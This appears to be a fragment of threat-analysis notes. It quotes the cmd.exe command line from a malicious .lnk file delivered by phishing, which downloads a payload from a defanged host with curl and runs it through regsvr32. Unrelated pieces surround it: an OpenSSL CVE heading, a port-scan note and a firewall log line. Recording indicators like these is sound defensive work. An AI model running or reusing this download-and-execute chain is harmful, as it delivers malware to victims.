SSL OpenSSL X509_V_FLAG_X509_STRICT and signature_algorithms Vulnerabilities (CVE-2021-3449)
censys-scanner.com
o Phishing email provides link to webhosted zip file and password for zip file called Documm52188256.zip
o It contains Analize752.lnk (sic) [The number changes]
This file contains this command:
Process "cmd.exe" with commandline "/q /c echo 'r_m' && MD "%LOCALAPPDATA%\QM" && echo "cW" && curl.exe -o %LOCALAPPDATA%\QM\zLy_m.Oi.Jv https://gesam[.]com[.]bo/qVx/1.png && regsvr32 "%LOCALAPPDATA%\QM\zLy_m.Oi.Jv" && ping OPO[.]com && ping rG02[.]com"
o When run it creates a directory called QM in "C:\Users\[redacted]\AppData\Local\"
This contains a portable executable called zLy_m.Oi.Jv that it tries to execute with a regsvr32 proxy.
10-24-2022
Port scan of large number of ports over 5 different destination IPs.
2022-11-26 05:13:13 FWDeny, Denied, pri=4, disp=Deny, src_ip=176.111.174.136, src_port=48436